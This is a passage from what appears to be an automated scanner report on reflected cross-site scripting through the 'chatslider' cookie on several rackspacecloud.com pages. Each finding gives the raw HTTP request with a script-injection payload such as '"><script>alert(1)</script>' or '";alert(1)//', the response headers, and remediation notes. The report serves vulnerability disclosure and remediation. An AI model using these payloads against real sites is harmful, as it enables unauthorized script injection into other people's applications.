Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D5a4e2"%3balert(1)//a272c516181; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 66280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7545"><script>alert(1)</script>8abcb03a760 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_faq/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Db7545"><script>alert(1)</script>8abcb03a760; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 66355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1b2"><script>alert(1)</script>855dd3f9e2 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8a1b2"><script>alert(1)</script>855dd3f9e2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 36470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c050"%3balert(1)//11e221f438f was submitted in the chatslider cookie. This input was echoed as 1c050";alert(1)//11e221f438f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1c050"%3balert(1)//11e221f438f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 36448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24281"%3balert(1)//23d72342c08 was submitted in the chatslider cookie. This input was echoed as 24281";alert(1)//23d72342c08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/files HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D24281"%3balert(1)//23d72342c08; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 41033
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1289e"><script>alert(1)</script>7b1f68a0f4a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/files HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1289e"><script>alert(1)</script>7b1f68a0f4a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 41060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9af"%3balert(1)//fb201e2e75e was submitted in the chatslider cookie. This input was echoed as ba9af";alert(1)//fb201e2e75e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/files/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dba9af"%3balert(1)//fb201e2e75e; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 40973
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 989fe"><script>alert(1)</script>aee80dd4db4 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/files/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D989fe"><script>alert(1)</script>aee80dd4db4; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 41018
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 551a2"%3balert(1)//73cfcc147a was submitted in the chatslider cookie. This input was echoed as 551a2";alert(1)//73cfcc147a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/servers HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D551a2"%3balert(1)//73cfcc147a; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 43091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6118d"><script>alert(1)</script>330551e35d2 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/servers HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D6118d"><script>alert(1)</script>330551e35d2; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 43079
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1213b"><script>alert(1)</script>044dc60872 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_products/servers/ HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D1213b"><script>alert(1)</script>044dc60872; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 43052
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aae02"%3balert(1)//c5c67c7b5f4 was submitted in the chatslider cookie. This input was echoed as aae02";alert(1)//c5c67c7b5f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/servers/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Daae02"%3balert(1)//c5c67c7b5f4; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 42990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10bff"%3balert(1)//1a2649babf1 was submitted in the chatslider cookie. This input was echoed as 10bff";alert(1)//1a2649babf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cloud_hosting_products/sites HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
